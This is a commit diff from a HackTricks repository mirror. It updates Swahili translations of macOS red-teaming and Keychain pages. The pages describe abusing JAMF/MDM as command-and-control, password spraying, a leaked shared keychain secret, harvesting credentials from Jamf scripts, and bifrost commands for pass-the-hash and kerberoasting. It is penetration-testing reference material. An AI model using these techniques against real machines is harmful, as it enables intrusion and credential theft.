2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-20 16:08:27 +00:00

Translated ['macos-hardening/macos-red-teaming/README.md', 'macos-harden

This commit is contained in:
Translator 2024-08-21 15:05:57 +00:00
parent 33841e49ba
commit 022f683fff
3 changed files with 309 additions and 182 deletions
macos-hardening
macos-red-teaming
macos-security-and-privilege-escalation/macos-files-folders-and-binaries

View file

@ -1,69 +1,69 @@
# Kufanya Udukuzi wa Red Teaming kwenye macOS
# macOS Red Teaming
{% hint style="success" %}
Jifunze na zoea Udukuzi wa AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**Mafunzo ya HackTricks kwa Wataalamu wa Timu Nyekundu ya AWS (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na zoea Udukuzi wa GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**Mafunzo ya HackTricks kwa Wataalamu wa Timu Nyekundu ya GCP (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Learn & practice AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Kutumia MDMs kwa Udukuzi
## Abusing MDMs
* JAMF Pro: `jamf checkJSSConnection`
* Kandji
Ikiwa unafanikiwa **kudukua vibali vya msimamizi** ili kupata upatikanaji wa jukwaa la usimamizi, unaweza **kudukua kompyuta zote** kwa kusambaza zisizo programu hasidi kwenye mashine.
Ikiwa utaweza **kudukua akauti za admin** ili kufikia jukwaa la usimamizi, unaweza **kudukua kompyuta zote** kwa kusambaza malware yako kwenye mashine.
Kwa red teaming katika mazingira ya MacOS, ni vyema kuwa na uelewa fulani wa jinsi MDMs zinavyofanya kazi:
Kwa red teaming katika mazingira ya MacOS, inashauriwa sana kuwa na ufahamu wa jinsi MDMs zinavyofanya kazi:
{% content-ref url="macos-mdm/" %}
[macos-mdm](macos-mdm/)
{% endcontent-ref %}
### Kutumia MDM kama C2
### Using MDM as a C2
MDM itakuwa na idhini ya kufunga, kuuliza au kuondoa maelezo, kufunga programu, kuunda akaunti za msimamizi wa ndani, kuweka nenosiri la firmware, kubadilisha ufunguo wa FileVault...
MDM itakuwa na ruhusa ya kufunga, kuuliza au kuondoa profaili, kufunga programu, kuunda akaunti za admin za ndani, kuweka nenosiri la firmware, kubadilisha ufunguo wa FileVault...
Ili kuendesha MDM yako mwenyewe unahitaji **CSR yako isainiwe na muuzaji** ambayo unaweza kujaribu kupata kwa kutumia [**https://mdmcert.download/**](https://mdmcert.download/). Na ili kuendesha MDM yako mwenyewe kwa vifaa vya Apple unaweza kutumia [**MicroMDM**](https://github.com/micromdm/micromdm).
Ili kuendesha MDM yako mwenyewe unahitaji **CSR yako isainiwe na muuzaji** ambayo unaweza kujaribu kupata na [**https://mdmcert.download/**](https://mdmcert.download/). Na ili kuendesha MDM yako mwenyewe kwa vifaa vya Apple unaweza kutumia [**MicroMDM**](https://github.com/micromdm/micromdm).
Hata hivyo, ili kufunga programu kwenye kifaa kilichojiandikisha, bado unahitaji iwe imesainiwa na akaunti ya mwandishi... hata hivyo, baada ya usajili wa MDM **kifaa huongeza cheti cha SSL cha MDM kama CA inayoweza kudhibitika**, hivyo sasa unaweza kusaini chochote.
Hata hivyo, ili kufunga programu kwenye kifaa kilichosajiliwa, bado unahitaji isainiwe na akaunti ya developer... hata hivyo, wakati wa usajili wa MDM **kifaa kinaongeza cheti cha SSL cha MDM kama CA inayotambulika**, hivyo sasa unaweza kusaini chochote.
Ili kujiandikisha kifaa kwenye MDM unahitaji kufunga faili ya **`mobileconfig`** kama root, ambayo inaweza kutolewa kupitia faili ya **pkg** (unaweza kuipachika kwenye zip na unapoidownload kutoka safari itaondolewa kwenye zip).
Ili kusajili kifaa katika MDM unahitaji kufunga **`mobileconfig`** faili kama root, ambayo inaweza kutolewa kupitia faili ya **pkg** (unaweza kuifunga katika zip na wakati inapakuliwa kutoka safari itafunguliwa).
**Mawakala wa Mythic Orthrus** hutumia mbinu hii.
**Mythic agent Orthrus** inatumia mbinu hii.
### Kutumia JAMF PRO vibaya
### Abusing JAMF PRO
JAMF inaweza kuendesha **maandishi ya desturi** (maandishi yaliyotengenezwa na msimamizi wa mfumo), **mizigo ya asili** (uundaji wa akaunti za ndani, kuweka nenosiri la EFI, ufuatiliaji wa faili/mchakato...) na **MDM** (mipangilio ya kifaa, vyeti vya kifaa...).
JAMF inaweza kuendesha **scripts za kawaida** (scripts zilizotengenezwa na sysadmin), **payloads za asili** (kuunda akaunti za ndani, kuweka nenosiri la EFI, ufuatiliaji wa faili/mchakato...) na **MDM** (mipangilio ya kifaa, vyeti vya kifaa...).
#### Usajili wa kujisajili wa JAMF
#### JAMF self-enrolment
Nenda kwenye ukurasa kama vile `https://<jina-la-kampuni>.jamfcloud.com/enroll/` kuona ikiwa wana **ruhusa ya kujisajili wenyewe**. Ikiwa wana inaweza **kuomba vibali vya kupata**.
Nenda kwenye ukurasa kama `https://<company-name>.jamfcloud.com/enroll/` kuona kama wana **self-enrolment enabled**. Ikiwa wanaweza **kuomba akauti za kufikia**.
Unaweza kutumia maandishi [**JamfSniper.py**](https://github.com/WithSecureLabs/Jamf-Attack-Toolkit/blob/master/JamfSniper.py) kufanya shambulio la kunyunyizia nenosiri.
Unaweza kutumia script [**JamfSniper.py**](https://github.com/WithSecureLabs/Jamf-Attack-Toolkit/blob/master/JamfSniper.py) kufanya shambulio la password spraying.
Zaidi ya hayo, baada ya kupata vibali sahihi unaweza kuwa na uwezo wa kuvunja nguvu majina mengine ya mtumiaji na fomu ifuatayo:
Zaidi ya hayo, baada ya kupata akauti sahihi unaweza kuwa na uwezo wa kujaribu nguvu majina mengine ya watumiaji kwa fomu ifuatayo:
![](<../../.gitbook/assets/image (107).png>)
#### Uthibitishaji wa Kifaa cha JAMF
#### JAMF device Authentication
<figure><img src="../../.gitbook/assets/image (167).png" alt=""><figcaption></figcaption></figure>
Faili ya **`jamf`** iliyomo siri ya kufungua keychain ambayo wakati wa ugunduzi ilikuwa **inashirikiwa** na kila mtu na ilikuwa: **`jk23ucnq91jfu9aj`**.\
Zaidi ya hayo, jamf **inaendelea** kama **LaunchDaemon** katika **`/Library/LaunchAgents/com.jamf.management.agent.plist`**
**`jamf`** binary ilikuwa na siri ya kufungua keychain ambayo wakati wa ugunduzi ilikuwa **shirikishi** kati ya kila mtu na ilikuwa: **`jk23ucnq91jfu9aj`**.\
Zaidi ya hayo, jamf **persist** kama **LaunchDaemon** katika **`/Library/LaunchAgents/com.jamf.management.agent.plist`**
#### Kuchukua Udhibiti wa Kifaa cha JAMF
#### JAMF Device Takeover
URL ya **JSS** (Jamf Software Server) ambayo **`jamf`** itatumia iko katika **`/Library/Preferences/com.jamfsoftware.jamf.plist`**.\
**JSS** (Jamf Software Server) **URL** ambayo **`jamf`** itatumia iko katika **`/Library/Preferences/com.jamfsoftware.jamf.plist`**.\
Faili hii kimsingi ina URL:
```bash
plutil -convert xml1 -o - /Library/Preferences/com.jamfsoftware.jamf.plist
@ -79,7 +79,9 @@ plutil -convert xml1 -o - /Library/Preferences/com.jamfsoftware.jamf.plist
```
{% endcode %}
Kwa hivyo, mshambuliaji anaweza kuweka pakiti ya madhara (`pkg`) ambayo **inaandika upya faili hii** wakati inapowekwa kwa kuweka **URL kwa msikilizaji wa Mythic C2 kutoka kwa wakala wa Typhon** sasa kuweza kutumia JAMF kama C2.
Hivyo, mshambuliaji anaweza kuweka kifurushi kibaya (`pkg`) ambacho **kinabadilisha faili hii** wakati wa usakinishaji na kuweka **URL kwa mskivu wa Mythic C2 kutoka kwa wakala wa Typhon** ili sasa aweze kutumia JAMF kama C2.
{% code overflow="wrap" %}
```bash
# After changing the URL you could wait for it to be reloaded or execute:
sudo jamf policy -id 0
@ -88,28 +90,28 @@ sudo jamf policy -id 0
```
{% endcode %}
#### Uigizaji wa JAMF
#### JAMF Ujumbe wa Kuingilia
Ili **kuiga mawasiliano** kati ya kifaa na JMF unahitaji:
* **UUID** ya kifaa: `ioreg -d2 -c IOPlatformExpertDevice | awk -F" '/IOPlatformUUID/{print $(NF-1)}'`
* **Kifunguo cha JAMF** kutoka: `/Library/Application\ Support/Jamf/JAMF.keychain` ambayo ina cheti cha kifaa
* **JAMF keychain** kutoka: `/Library/Application\ Support/Jamf/JAMF.keychain` ambayo ina cheti cha kifaa
Ukiwa na habari hizi, **unda VM** na **UUID iliyoporwa** ya Vifaa na **SIP imelemazwa**, achia **Kifunguo cha JAMF,** **unganishe** agizo la Jamf na ibebe habari zake.
Kwa habari hii, **unda VM** yenye **stolen** Hardware **UUID** na **SIP disabled**, weka **JAMF keychain,** **hook** agent wa Jamf na uibe habari zake.
#### Uibaji wa Siri
#### Kuiba Siri
<figure><img src="../../.gitbook/assets/image (1025).png" alt=""><figcaption><p>a</p></figcaption></figure>
Unaweza pia kufuatilia eneo `/Library/Application Support/Jamf/tmp/` kwa **maandishi ya desturi** ambayo wasimamizi wanaweza kutaka kutekeleza kupitia Jamf kwani yanawekwa hapa, kutekelezwa na kuondolewa. Maandishi haya **yanaweza kuwa na siri**.
Unaweza pia kufuatilia eneo `/Library/Application Support/Jamf/tmp/` kwa ajili ya **custom scripts** ambao wasimamizi wanaweza kutaka kutekeleza kupitia Jamf kwani **zimewekwa hapa, zinatekelezwa na kuondolewa**. Scripts hizi **zinaweza kuwa na credentials**.
Hata hivyo, **siri** inaweza kupitishwa kupitia maandishi haya kama **parameta**, hivyo unahitaji kufuatilia `ps aux | grep -i jamf` (bila hata kuwa na mizizi).
Hata hivyo, **credentials** zinaweza kupitishwa kwa scripts hizi kama **parameters**, hivyo unahitaji kufuatilia `ps aux | grep -i jamf` (bila hata kuwa root).
Skripti [**JamfExplorer.py**](https://github.com/WithSecureLabs/Jamf-Attack-Toolkit/blob/master/JamfExplorer.py) inaweza kusikiliza faili mpya zinazoongezwa na hoja mpya za mchakato.
Script [**JamfExplorer.py**](https://github.com/WithSecureLabs/Jamf-Attack-Toolkit/blob/master/JamfExplorer.py) inaweza kusikiliza kwa faili mpya zinazoongezwa na hoja mpya za mchakato.
### Upatikanaji wa Mbali wa macOS
### macOS Ufikiaji wa Kijijini
Na pia kuhusu **itifaki** za **mtandao** za **"maalum" za MacOS**:
Na pia kuhusu **MacOS** "maalum" **network** **protocols**:
{% content-ref url="../macos-security-and-privilege-escalation/macos-protocols.md" %}
[macos-protocols.md](../macos-security-and-privilege-escalation/macos-protocols.md)
@ -117,7 +119,7 @@ Na pia kuhusu **itifaki** za **mtandao** za **"maalum" za MacOS**:
## Active Directory
Katika baadhi ya matukio utagundua kuwa **kompyuta ya MacOS imeunganishwa na AD**. Katika hali hii unapaswa kujaribu **kuorodhesha** active directory kama ulivyoizoea. Pata **msaada** katika kurasa zifuatazo:
Katika hali fulani utaona kuwa **kompyuta ya MacOS imeunganishwa na AD**. Katika hali hii unapaswa kujaribu **kuorodhesha** active directory kama unavyozoea. Pata **msaada** katika kurasa zifuatazo:
{% content-ref url="../../network-services-pentesting/pentesting-ldap.md" %}
[pentesting-ldap.md](../../network-services-pentesting/pentesting-ldap.md)
@ -131,33 +133,36 @@ Katika baadhi ya matukio utagundua kuwa **kompyuta ya MacOS imeunganishwa na AD*
[pentesting-kerberos-88](../../network-services-pentesting/pentesting-kerberos-88/)
{% endcontent-ref %}
Zana ya **lokalini ya MacOS** ambayo inaweza pia kukusaidia ni `dscl`:
Zana **za ndani za MacOS** ambazo zinaweza pia kukusaidia ni `dscl`:
```bash
dscl "/Active Directory/[Domain]/All Domains" ls /
```
Pia kuna zana zilizoandaliwa kwa MacOS kwa kuchunguza moja kwa moja AD na kucheza na kerberos:
Pia kuna zana zilizotayarishwa kwa MacOS ili kuhesabu moja kwa moja AD na kucheza na kerberos:
* [**Machound**](https://github.com/XMCyber/MacHound): MacHound ni nyongeza ya zana ya ukaguzi wa Bloodhound inayoruhusu kukusanya na kuingiza mahusiano ya Active Directory kwenye mwenyeji wa MacOS.
* [**Bifrost**](https://github.com/its-a-feature/bifrost): Bifrost ni mradi wa Objective-C ulioundwa kuingiliana na APIs za Heimdal krb5 kwenye macOS. Lengo la mradi huu ni kuwezesha upimaji bora wa usalama kuhusu Kerberos kwenye vifaa vya macOS kwa kutumia APIs za asili bila kuhitaji mfumo mwingine au pakiti yoyote kwenye lengo.
* [**Orchard**](https://github.com/its-a-feature/Orchard): Zana ya JavaScript for Automation (JXA) kufanya uchunguzi wa Active Directory.
* [**Machound**](https://github.com/XMCyber/MacHound): MacHound ni nyongeza kwa zana ya ukaguzi ya Bloodhound inayoruhusu kukusanya na kuingiza uhusiano wa Active Directory kwenye mwenyeji wa MacOS.
* [**Bifrost**](https://github.com/its-a-feature/bifrost): Bifrost ni mradi wa Objective-C ulioandaliwa ili kuingiliana na Heimdal krb5 APIs kwenye macOS. Lengo la mradi ni kuwezesha upimaji bora wa usalama kuhusiana na Kerberos kwenye vifaa vya macOS kwa kutumia APIs za asili bila kuhitaji mfumo mwingine wowote au pakiti kwenye lengo.
* [**Orchard**](https://github.com/its-a-feature/Orchard): Zana ya JavaScript kwa Utaftaji (JXA) kufanya hesabu ya Active Directory.
### Taarifa za Kikoa
```bash
echo show com.apple.opendirectoryd.ActiveDirectory | scutil
```
### Watumiaji
### Users
Aina tatu za watumiaji wa MacOS ni:
- **Watumiaji wa Ndani** - Wanasimamiwa na huduma ya OpenDirectory ya ndani, hawajaunganishwa kwa njia yoyote na Active Directory.
- **Watumiaji wa Mtandao** - Watumiaji wa Active Directory wa muda wanaohitaji kuunganishwa kwa seva ya DC ili kuthibitisha.
- **Watumiaji wa Simu** - Watumiaji wa Active Directory wenye nakala rudufu ya ndani kwa ajili ya vitambulisho vyao na faili zao.
* **Local Users** — Inasimamiwa na huduma ya OpenDirectory ya ndani, hawajashikamana kwa njia yoyote na Active Directory.
* **Network Users** — Watumiaji wa Active Directory wanaobadilika ambao wanahitaji muunganisho na seva ya DC ili kuthibitisha.
* **Mobile Users** — Watumiaji wa Active Directory wenye nakala ya ndani ya hati zao na faili.
Maelezo ya ndani kuhusu watumiaji na vikundi hufanywa katika folda _/var/db/dslocal/nodes/Default._ Kwa mfano, maelezo kuhusu mtumiaji anayeitwa _mark_ hufanywa katika _/var/db/dslocal/nodes/Default/users/mark.plist_ na maelezo kuhusu kikundi _admin_ yapo katika _/var/db/dslocal/nodes/Default/groups/admin.plist_.
Taarifa za ndani kuhusu watumiaji na vikundi zinaifadhiwa katika folda _/var/db/dslocal/nodes/Default._\
Kwa mfano, taarifa kuhusu mtumiaji anayeitwa _mark_ zinaifadhiwa katika _/var/db/dslocal/nodes/Default/users/mark.plist_ na taarifa kuhusu kundi _admin_ ziko katika _/var/db/dslocal/nodes/Default/groups/admin.plist_.
Mbali na kutumia HasSession na AdminTo edges, **MacHound huongeza makali matatu mapya** kwenye database ya Bloodhound:
Mbali na kutumia edges za HasSession na AdminTo, **MacHound inaongeza edges tatu mpya** kwenye hifadhidata ya Bloodhound:
- **InawezaSSH** - kifaa kinachoruhusiwa kufanya SSH kwa mwenyeji
- **InawezaVNC** - kifaa kinachoruhusiwa kufanya VNC kwa mwenyeji
- **InawezaAE** - kifaa kinachoruhusiwa kutekeleza skripti za AppleEvent kwenye mwenyeji
* **CanSSH** - chombo kinachoruhusiwa SSH kwa mwenyeji
* **CanVNC** - chombo kinachoruhusiwa VNC kwa mwenyeji
* **CanAE** - chombo kinachoruhusiwa kutekeleza scripts za AppleEvent kwenye mwenyeji
```bash
#User enumeration
dscl . ls /Users
@ -179,11 +184,42 @@ dscl "/Active Directory/TEST/All Domains" read "/Groups/[groupname]"
#Domain Information
dsconfigad -show
```
More info in [https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/](https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/)
Zaidi ya habari katika [https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/](https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/)
## Kupata Ufikiaji wa Keychain
### Computer$ password
Keychain ina uwezekano mkubwa wa kuwa na habari nyeti ambazo zikipatikana bila kutoa ombi la kuthibitisha zinaweza kusaidia katika kuendeleza zoezi la timu nyekundu:
Pata nywila kwa kutumia:
```bash
bifrost --action askhash --username [name] --password [password] --domain [domain]
```
Inawezekana kufikia nenosiri la **`Computer$`** ndani ya mfumo wa keychain.
### Over-Pass-The-Hash
Pata TGT kwa mtumiaji na huduma maalum:
```bash
bifrost --action asktgt --username [user] --domain [domain.com] \
--hash [hash] --enctype [enctype] --keytab [/path/to/keytab]
```
Mara tu TGT imekusanywa, inawezekana kuingiza katika kikao cha sasa kwa:
```bash
bifrost --action asktgt --username test_lab_admin \
--hash CF59D3256B62EE655F6430B0F80701EE05A0885B8B52E9C2480154AFA62E78 \
--enctype aes256 --domain test.lab.local
```
### Kerberoasting
```bash
bifrost --action asktgs --spn [service] --domain [domain.com] \
--username [user] --hash [hash] --enctype [enctype]
```
Kwa tiketi za huduma zilizopatikana, inawezekana kujaribu kufikia sehemu katika kompyuta nyingine:
```bash
smbutil view //computer.fqdn
mount -t smbfs //server/folder /local/mount/point
```
## Kufikia Keychain
Keychain ina uwezekano mkubwa kuwa na taarifa nyeti ambazo ikiwa zitafikiwa bila kuunda kichocheo zinaweza kusaidia kuendeleza zoezi la red team:
{% content-ref url="macos-keychain.md" %}
[macos-keychain.md](macos-keychain.md)
@ -191,13 +227,13 @@ Keychain ina uwezekano mkubwa wa kuwa na habari nyeti ambazo zikipatikana bila k
## Huduma za Nje
Kuunda Timu Nyekundu ya MacOS ni tofauti na Timu Nyekundu ya kawaida ya Windows kwa kawaida **MacOS imeunganishwa na majukwaa kadhaa ya nje moja kwa moja**. Mazingira ya kawaida ya MacOS ni kupata kompyuta kwa kutumia **sifa zilizosawazishwa za OneLogin, na kupata huduma kadhaa za nje** (kama vile github, aws...) kupitia OneLogin.
MacOS Red Teaming ni tofauti na Red Teaming ya kawaida ya Windows kwani kawaida **MacOS imeunganishwa na majukwaa kadhaa ya nje moja kwa moja**. Mipangilio ya kawaida ya MacOS ni kufikia kompyuta kwa kutumia **OneLogin credentials zilizoratibiwa, na kufikia huduma kadhaa za nje** (kama github, aws...) kupitia OneLogin.
## Mbinu za Timu Nyekundu za Kitaalam
## Mbinu Mbalimbali za Red Team
### Safari
Wakati faili inapakuliwa kwenye Safari, ikiwa ni faili "salama", ita **funguliwa moja kwa moja**. Kwa mfano, ikiwa **unapakua zip**, itafunguliwa moja kwa moja:
Wakati faili inapopakuliwa katika Safari, ikiwa ni faili "salama", itafunguliwa **automatically**. Hivyo kwa mfano, ikiwa **unapakua zip**, itafunguliwa moja kwa moja:
<figure><img src="../../.gitbook/assets/image (226).png" alt=""><figcaption></figcaption></figure>
@ -210,16 +246,16 @@ Wakati faili inapakuliwa kwenye Safari, ikiwa ni faili "salama", ita **funguliwa
* [**OBTS v3.0: "An Attackers Perspective on Jamf Configurations" - Luke Roberts / Calum Hall**](https://www.youtube.com/watch?v=ju1IYWUv4ZA)
{% hint style="success" %}
Jifunze & zoezi Hacking ya AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**Mafunzo ya HackTricks ya Mtaalam wa Timu Nyekundu ya AWS (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze & zoezi Hacking ya GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**Mafunzo ya HackTricks ya Mtaalam wa Timu Nyekundu ya GCP (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Learn & practice AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa michango**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

View file

@ -1,16 +1,16 @@
# macOS Keychain
{% hint style="success" %}
Jifunze na zoezi la Udukuzi wa AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**Mafunzo ya HackTricks ya Mtaalam wa Timu Nyekundu ya AWS (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na zoezi la Udukuzi wa GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**Mafunzo ya HackTricks ya Mtaalam wa Timu Nyekundu ya GCP (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Learn & practice AWS Hacking:<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa michango**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
@ -19,69 +19,72 @@ Jifunze na zoezi la Udukuzi wa GCP: <img src="/.gitbook/assets/grte.png" alt=""
<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utafutaji inayotumiwa na **dark-web** ambayo inatoa kazi za **bure** kuangalia kama kampuni au wateja wake wamekuwa **compromised** na **stealer malwares**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba habari.
Lengo lao kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulizi ya ransomware yanayotokana na malware inayopora taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** hapa:
Unaweza kuangalia tovuti yao na kujaribu injini yao kwa **bure** kwenye:
{% embed url="https://whiteintel.io" %}
***
## Keychains Kuu
## Main Keychains
* **Keychain ya Mtumiaji** (`~/Library/Keychains/login.keycahin-db`), ambayo hutumika kuhifadhi **siri maalum za mtumiaji** kama nywila za programu, nywila za mtandao, vyeti vilivyoundwa na mtumiaji, nywila za mtandao, na funguo za umma/binafsi zilizoundwa na mtumiaji.
* **Keychain ya Mfumo** (`/Library/Keychains/System.keychain`), ambayo hifadhi **siri za mfumo kwa ujumla** kama vile nywila za WiFi, vyeti vya msingi vya mfumo, funguo binafsi za mfumo, na nywila za programu za mfumo.
* **User Keychain** (`~/Library/Keychains/login.keycahin-db`), ambayo inatumika kuhifadhi **credentials za mtumiaji** kama vile nywila za programu, nywila za mtandao, vyeti vilivyoundwa na mtumiaji, nywila za mtandao, na funguo za umma/za faragha zilizoundwa na mtumiaji.
* **System Keychain** (`/Library/Keychains/System.keychain`), ambayo inahifadhi **credentials za mfumo mzima** kama vile nywila za WiFi, vyeti vya mfumo wa mizizi, funguo za faragha za mfumo, na nywila za programu za mfumo.
### Upatikanaji wa Keychain ya Nywila
### Password Keychain Access
Faili hizi, ingawa hazina ulinzi wa asili na zinaweza **kupakuliwa**, zimefichwa na zinahitaji **nywila ya wazi ya mtumiaji ili kufichuliwa**. Zana kama [**Chainbreaker**](https://github.com/n0fate/chainbreaker) inaweza kutumika kwa kufichua.
Faili hizi, ingawa hazina ulinzi wa ndani na zinaweza **downloaded**, zimefungwa na zinahitaji **nywila ya mtumiaji ya maandiko ili kufunguliwa**. Chombo kama [**Chainbreaker**](https://github.com/n0fate/chainbreaker) kinaweza kutumika kwa ajili ya ufunguo.
## Kinga ya Viingilio vya Keychain
## Keychain Entries Protections
### ACLs
Kila kuingilio katika keychain inatawaliwa na **Orodha za Kudhibiti Upatikanaji (ACLs)** ambazo zinaamua ni nani anaweza kutekeleza vitendo mbalimbali kwenye kuingilio cha keychain, ikiwa ni pamoja na:
Kila ingizo katika keychain linaongozwa na **Access Control Lists (ACLs)** ambazo zinaelekeza nani anaweza kufanya vitendo mbalimbali kwenye ingizo la keychain, ikiwa ni pamoja na:
* **ACLAuhtorizationExportClear**: Inaruhusu mmiliki kupata maandishi wazi ya siri.
* **ACLAuhtorizationExportWrapped**: Inaruhusu mmiliki kupata maandishi wazi yaliyofichwa na nywila nyingine iliyotolewa.
* **ACLAuhtorizationAny**: Inaruhusu mmiliki kutekeleza kitendo chochote.
* **ACLAuhtorizationExportClear**: Inaruhusu mwenyewe kupata maandiko ya siri.
* **ACLAuhtorizationExportWrapped**: Inaruhusu mwenyewe kupata maandiko ya wazi yaliyofichwa kwa nywila nyingine iliyotolewa.
* **ACLAuhtorizationAny**: Inaruhusu mwenyewe kufanya kitendo chochote.
ACLs hizo zinaambatana na **orodha ya programu za kuaminika** ambazo zinaweza kutekeleza vitendo hivi bila kuulizwa. Hii inaweza kuwa:
ACLs zinakuja na **orodha ya programu zinazotegemewa** ambazo zinaweza kufanya vitendo hivi bila kuombwa. Hii inaweza kuwa:
* **N`il`** (hakuna idhini inayohitajika, **kila mtu anaaminika**)
* Orodha **tupu** (**hakuna mtu** anaaminika)
* **Orodha** ya **programu maalum**.
* **N`il`** (hakuna idhini inayohitajika, **kila mtu anategemewa**)
* Orodha **tyupu** (**hakuna mtu** anategemewa)
* **Orodha** ya **programu** maalum.
Pia kuingilio kinaweza kuwa na funguo **`ACLAuthorizationPartitionID`,** ambayo hutumiwa kutambua **teamid, apple,** na **cdhash.**
Pia ingizo linaweza kuwa na funguo **`ACLAuthorizationPartitionID`,** ambayo inatumika kutambua **teamid, apple,** na **cdhash.**
* Ikiwa **teamid** imetajwa, basi ili **kupata thamani ya kuingilio** bila **kuuliza**, programu iliyotumika lazima iwe na **teamid sawa**.
